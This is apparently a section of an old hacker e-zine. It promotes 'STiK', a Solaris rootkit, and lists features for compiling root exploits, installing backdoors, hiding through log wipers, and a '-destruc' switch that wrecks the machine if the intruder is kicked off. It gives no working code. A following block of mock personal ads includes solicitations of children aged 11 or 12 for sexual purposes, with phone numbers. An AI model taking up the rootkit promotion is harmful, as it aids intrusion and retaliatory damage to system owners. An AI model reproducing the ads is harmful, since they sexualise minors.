STiK is a deluxe rootkit for the solaris platform containing not only tools that enable you to gain root access it also allows you to keep it with backdoors. The Alpha version of STiK includes exploits, backdoors, sniffers, connection hijackers, a stealth mode, and eventualy will also include other kewl tewls such as spoofers, other new inovative remote root access backdoors, and maybe if I have enough time a extra option to help you construct your own buffer overflow exploits. STiK supports these platforms... sparc10 and sparc20 and it minimaly supports x86 platforms. The only conflicts you may have while using this tool is if, (like an (i)diot) you use the -Sun4 switch on a solaris 5.x machine or say the -x86 swtich on a -Sun5 and visa versa... but nobody is that stupid. STiK includes the following options.... -Sun4, -Sol5, -x86 --> compiles exploits for following platforms. -backdrs --> installs backdoors and suggests 'em. -stealth --> does whut it says... and very well. -destruc --> if you get cauaght online reek some havok -man --> shows 3r33t manpage -Sun4 compiles loits for SunOS 4.x -Sol5 compiles loits for Solaris 2.5.x -x86 compiles loits for x86 platforms of solaris and sunos -backdrs backdoor menu feature,,, pick and choose or mix and match -stealth invokes programs such as cloak, zap2, block, and etc... -destruc if you get caught and booted this will invoke and fuck some shit up majorly. We dont wanna be destructive but hey !!!YOU FUCKING KICKED ME OFF YER MACHINE ASSHOLE I DIDN'T INVOKE THE -destruc FEATURE R00T DID!!! -man full featured reverse switched manpage to fuck wid yer headz If you'z mutha fuxx0rs have any shit you would like me to add so STiK then speak now or do without cause I have been hard at work coding shit... Also anyone who wants to help port lrk3 backdoors and shit to solaris drop me a line cause its a bitch doing it all by yerself... edge@mindwerks.com ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── --------------------------------------+--------------------------------------- | YOUR SPECIAL AD | LET'S BE FREE | COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking | for men, 12 - 32 clean, fit, and SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters. ADZ@CODEZ.COM | Call Anytime : (816)781-8009 | (Ask for Tommy) | --------------------------------------+--------------------------------------- | ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@ | Looking for men 11 - 12 for adult | Yeah huney, you know you want me, video satisfaction. I am 35 into | I'll treat you just right, I'm Professional wrestling. | waiting for your call today! Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154 | (Ask for Kim) --------------------------------------+--------------------------------------- ─────────────────────────────────────────────────────────────────────────────── .oO The CodeZero Oo. ─────────────────────────────────────────────────────────────────────────────── _ /| k0dek4t sez... \'o O' =(_o_)= "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@" ::: http://insecurity.insecurity.org/codez/ ::: ─────────────────────────────────────────────────────────────────────────────── Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#* ───────────────────────────────────────────────────────────────────────────────